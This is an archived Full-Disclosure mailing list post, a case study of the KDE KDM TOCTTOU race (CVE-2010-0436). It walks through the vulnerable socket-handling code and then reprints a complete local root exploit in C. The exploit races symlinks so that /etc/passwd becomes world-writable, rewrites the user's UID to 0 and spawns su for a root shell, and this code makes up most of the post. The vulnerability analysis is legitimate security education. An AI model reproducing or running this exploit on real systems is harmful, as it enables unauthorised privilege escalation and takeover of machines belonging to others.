lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 3 Nov 2013 10:16:38 +0900
From: x90c <geinblues@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Case Study: CVE-2010-0436 KDE TOCTTOU
	vulnerability

CVE vulnerability Case Study: CVE-2010-0436 KDE TOCTTOU vulnerability

                                    ___    ___
                                   / _ \  / _ \
                            __  __| (_) || | | |  ___
                            \ \/ / \__. || | | | / __|
                             >  <    / / | |_| || (__
                            /_/\_\  /_/   \___/  \___|


[toc]

----[ 1 - Abstract

----[ 2 - Vulnerbility Details

----[ 3 - Exploit code
 ----[ 4 - Conclusion

        ----[ 5 - References

        ----[ 6 - Greets


----[ 1 - Abstract

It's the case study of the cve-2010-0436 KDE TOCTTOU discovered by stealth.
I explains the cve-2010-0436 vulnerability and the details finally, exploit
code.

The cve-2010-0436 has a vulnerability to lead to local privilege escalation
It ocurred at the openCtrl function in the kdebase-workspace-4.1.4/kdm/back
end/ctrl.c, the display manager daemon.

A little TOCTTOU cve cases are reported, in apache, bzip2, gzip, ...
openldap, openssl, kerberos, openoffice, cups, samba, xinetd, perl, KDE.
(Table 1: Reported TOCTTOU Vulnerabilities [1]) and the cwe observed example
of the TOCTTOU vulnerabilities are CVE-2003-0813 rpc dcom CVE-2004-0594 php
CVE-2008-2958/CVE -2008-1570 checkinstall,  [2].


----[ 2 - Vulnerability Details


/var/run/xdmctl/dmctl-$DISPLAY/socket


---- snip ---- snip ---- snip ---- snip ---- snip ---- snip ---- snip ----
snip ---- snip ---- snip ---- snip ----

...

/*
 * xdm - display manager daemon
 * Author: Keith Packard, MIT X Consortium
 *
 * display manager
 */

...

void
openCtrl( struct display *d )  /* vulnerable function */
{
  CtrlRec *cr;
  const char *dname;
  char *sockdir;
  struct sockaddr_un sa;

  if (!*fifoDir)
    return;
  if (d) {
    cr = &d->ctrl, dname = d->name;
    if (!memcmp( dname, "localhost:", 10 ))
      dname += 9;
  } else
    cr = &ctrl, dname = 0;
    if (cr->fd < 0) {
      if (mkdir( fifoDir, 0755 )) {
        if (errno != EEXIST) {
  logError( "mkdir %\"s failed; no control FiFos will be available\n",
             fifoDir );
  return;
}
      } else
        chmod( fifoDir, 0755 ); /* override umask */

sockdir = 0;
strApp( &sockdir, fifoDir, dname ? "/dmctl-" : "/dmctl",
        dname, (char *)0 );

/* socket directory exists? */
if (sockdir) {
  strApp( &cr->path, sockdir, "/socket", (char *)0 ); /* get a string of
cr->path '/socket'

 attached. */

  if (cr->path) {
    if (strlen( cr->path ) >= sizeof(sa.sun_path))
      logError( "path %\"s too long; no control sockets will be
available\n",
         cr->path );
    else if (mkdir( sockdir, 0755 ) && errno != EEXIST) // directory create
failed?
      logError( "mkdir %\"s failed; no control sockets will be available\n",
         sockdir );

    else { /* XXX: directory created?. ( /socket dir permmision 755 ) */
      if (!d)
        chown( sockdir, -1, fifoGroup );

/* XXX: change sockdir directory permission to 750. */
chmod( sockdir, 0750 );

if ((cr->fd = socket( PF_UNIX, SOCK_STREAM, 0 )) < 0) // create socket.
  logError( "Cannot create control socket\n" );
else { // socket created?

           unlink( cr->path ); // (1) unlink cr->path. (socket file)

  sa.sun_family = AF_UNIX;
  strcpy( sa.sun_path, cr->path );

  if (!bind( cr->fd, (struct sockaddr *)&sa, sizeof(sa) )) {
    if (!listen( cr->fd, 5 )) { // (2) listen.

    /* (3) XXX: vulnerable point - set permission 666 after cr->path
                           created newly. */
      chmod( cr->path, 0666 );

      registerCloseOnFork( cr->fd );
      registerInput( cr->fd );
      free( sockdir );
      return;

...


---- snip ---- snip ---- snip ---- snip ---- snip ---- snip ---- snip ----
snip ---- snip ---- snip ---- snip ----


(1) unlink /var/run/xdmctl/dmctl-$DISPLAY/socket file and (2) bind and
listen get an new socket and the socket file and (3) chmod 666 the socket
file. After unlink the socket file ln -s /etc/shadow /var/run/xdmctl/dmctl
-$DISPLAY/socket and (2) failed and chmod 666 the socket file to lead to
chmod /etc/shadow 666. TOCTTOU!

A process do symlink and another process open the display continualy, can
get the read/writable /etc/shadow file. The open the display via the AF_UNIX
socket.


----[ 3 - Exploit Code


See the exploit process via stealth's exploit code:

[bambule-digitale.c]
----
/* bambule-digitale.c aka krm.c - KDE Root Manager
 *
 * KDE3/4 KDM local root exploit (C) 2010
 * Successfully tested on openSUSE 11.2 with intel Core2 x64
 * a 1.6Ghz. But this is not Linux specific!
 *
 * Bug is a silly race. KDM opens control socket in
 * /var/run/xdmctl/dmctl-$DISPLAY/socket. It looks safe
 * since the dir containing the socket is chowned to user [2]
 * after the bind()/chmod() [1] has been done. However, rmdir() [3]
 * retval is not checked and therefore upon restart mkdir()
 * for a root owned socket dir fails. Thus still owned by
 * user who can then play symlink tricks:
 *
 * kdm/backend/ctrl.c:
 *
 * ...
 *       if ((cr->fd = socket( PF_UNIX, SOCK_STREAM, 0 )) < 0)
 *              LogError( "Cannot create control socket\n" );
 *       else {
 *              unlink( cr->path );
 *              sa.sun_family = AF_UNIX;
 *              strcpy( sa.sun_path, cr->path );
 *              if (!bind( cr->fd, (struct sockaddr *)&sa, sizeof(sa) )) {
 *                      if (!listen( cr->fd, 5 )) {
 * [1]                          chmod( cr->path, 0666 );
 *                              RegisterCloseOnFork( cr->fd );
 *                              RegisterInput( cr->fd );
 *                              free( sockdir );
 *                              return;
 *                      }
 *                      unlink( cr->path );
 *                      LogError( "Cannot listen on control socket %\"s\n",
 *                                cr->path );
 * ...
 *
 *
 * void
 * chownCtrl( CtrlRec *cr, int uid )
 * {
 *       if (cr->path) {
 *               char *ptr = strrchr( cr->path, '/' );
 *               *ptr = 0;
 * [2]           chown( cr->path, uid, -1 );
 *               *ptr = '/';
 *       }
 * }
 *
 *
 * void
 * closeCtrl( struct display *d )
 * {
 *       CtrlRec *cr = d ? &d->ctrl : &ctrl;
 *
 *       if (cr->fd >= 0) {
 *               UnregisterInput( cr->fd );
 *               CloseNClearCloseOnFork( cr->fd );
 *               cr->fd = -1;
 *               unlink( cr->path );
 *               *strrchr( cr->path, '/' ) = 0;
 * [3]           rmdir( cr->path );
 *               free( cr->path );
 *               cr->path = 0;
 *               while (cr->css) {
 *                       struct cmdsock *cs = cr->css;
 *                       cr->css = cs->next;
 *                       nukeSock( cs );
 *               }
 *       }
 * }
 *
 * We make [3] fail by creating an entry in socketdir when it was
 * chowned to us. Creating an inotify for socket creations which
 * is delivered to us before chmod at [1]. Even if its very small
 * race we have good chances to win on fast machines with more
 * than one CPU node, e.g. common setup today.
 *
 * Log into KDM session, switch to console and login as same user.
 * Start program and follow instructions.
 *
 * No greets to anyone; you all suck badly :D
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/inotify.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <signal.h>
#include <sys/select.h>
#include <sys/syscall.h>
#include <sched.h>
#include <time.h>


void die(const char *msg)
{
perror(msg);
exit(errno);
}


void give_me_r00t()
{
int fd;
char buf[128], c;
char *pwd = NULL, *ptr = NULL;
struct stat st;
off_t off = 0;

if ((fd = open("/etc/passwd", O_RDWR)) < 0)
die("[-] open");
fstat(fd, &st);
if ((pwd = malloc(st.st_size)) == NULL)
die("[-] malloc");
if (read(fd, pwd, st.st_size) != st.st_size)
die("[-] read");
snprintf(buf, sizeof(buf), "%s:x:", getenv("USER"));
ptr = strstr(pwd, buf);
if (!ptr) {
printf("[-] Wrong /etc/passwd format\n");
close(fd);
return;
}
off = lseek(fd, ptr - pwd + strlen(buf), SEEK_SET);
free(pwd);
for (;;) {
pread(fd, &c, 1, off);
if (c == ':')
break;
write(fd, "0", 1);
++off;
}
close(fd);
sync();
}


int main()
{
char buf[128];
int ifd = 0;
struct stat st;
struct sockaddr_un sun;
int sfd;
const char *sock_dir = "/var/run/xdmctl/dmctl-:0";
char *su[] = {"/bin/su", getenv("USER"), NULL};

srand(time(NULL));

chdir(sock_dir); /* (1) chdir sock_dir. */

memset(&sun, 0, sizeof(sun));
sun.sun_family = AF_UNIX;
strcpy(sun.sun_path, "socket2");

mkdir("hold me", 0);
signal(SIGPIPE, SIG_IGN);

symlink("/etc/passwd", "passwd"); // (2) ln -s /etc/passwd ./passwd

printf("--==[ KDM3/4 local root PoC successfully tested on dual-core
]==--\n");
printf("[+] Setup done. switch to KDM session and press Ctrl-Alt-Backspace
(logout)\n");
printf("[+] KDM screen will start to flicker (one restart per 2
seconds)\n");
printf("[+] Be patient, this can take some minutes! If it takes more
than\n");
printf("[+] 5mins or so it runs on the wrong CPU node; try again.\n");
printf("[+] If KDM screen stands still again, switch back to console.\n");

for (;;) { // (3) race!

/* (2) open the display via PF_UNIX socket. */
if ((sfd = socket(PF_UNIX, SOCK_STREAM, 0)) < 0)
die("[-] socket");
if ((ifd = inotify_init()) < 0)
die("[-] inotify_init");
if (inotify_add_watch(ifd, sock_dir, IN_CREATE) < 0)
die("[-] inotify_add_watch");

/* (4) unlink socket2 */
unlink("socket2");

/* blocks until race */
syscall(SYS_read, ifd, buf, 1);

/* be very fast, thus syscall() instead of glibc functions */
syscall(SYS_rename, "socket", "socket2"); /* (5) rename socket socket2 */
syscall(SYS_symlink, "passwd", "socket"); /* (6) ln -s passwd socket */
close(ifd);

if (stat("/etc/passwd", &st) < 0)
die("[-] stat");
if ((st.st_mode & 0666) == 0666)
break;
sleep(2);
usleep(100 + (int)(50.0*rand()/(RAND_MAX+1.0)));

/* (7) AF_UNIX socket to open the display (to create the socket file) */
if (connect(sfd, (struct sockaddr *)&sun, sizeof(sun)) < 0)
break;
write(sfd, "suicide\n", 8);
close(sfd);
}

/* (8) exploited? */
if (stat("/etc/passwd", &st) < 0)
die("[-] stat");
if ((st.st_mode & 0666) != 0666) {
printf("[-] Exploit failed.\n");
return 1;
}

printf("[+] yummy! /etc/passwd world writable!\n");
give_me_r00t();
printf("[+] Type your user password now. If there is no rootshell, nscd is
playing tricks.
                'su %s' then.\n", getenv("USER"));
execve(*su, su, NULL);
return 0;
}
----

The exploit comment explains also the related chownCtrl, closeCtrl.
First chdir to the socket directory and symlink /etc/passwd ./socket and
the next race! (4) unlink the socket2 and (5) rename socket to socket2
(6) symlink passwd (symlink'd) to ./socket and (7) AF_UNIX socket connect!

A process symlink /etc/passwd to /var/run/xdmctl/dmctl-:0/socket and the
another process open the display continualy and privilege escalation!


----[ 4 - Conclusion

If to find an TOCTTOU vulnerability, can audit the unlink/create/chmod
codes. If the code flow thaa unlink to chmod no permission checks and
can get the vulnerability.

I explained the KDM TOCTTOU vulnerability via summary, references and
the explanation of the process of the exploit.


----[ 5 - References

[1] TOCTTOU Vulnerabilities in UNIX-Style File Systems: An Anatomical Study
    https://www.usenix.org/legacy/event/fast05/tech/full_papers/wei/wei.pdf

[2] CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition
    http://cwe.mitre.org/data/definitions/367.html


----[ 5 - Greets

my stuffs are more favorite than rebel's stuffs.


EOF

Content of type "text/html" skipped

View attachment "case_study_CVE-2010-0436_KDE.txt" of type "text/plain" (12282 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ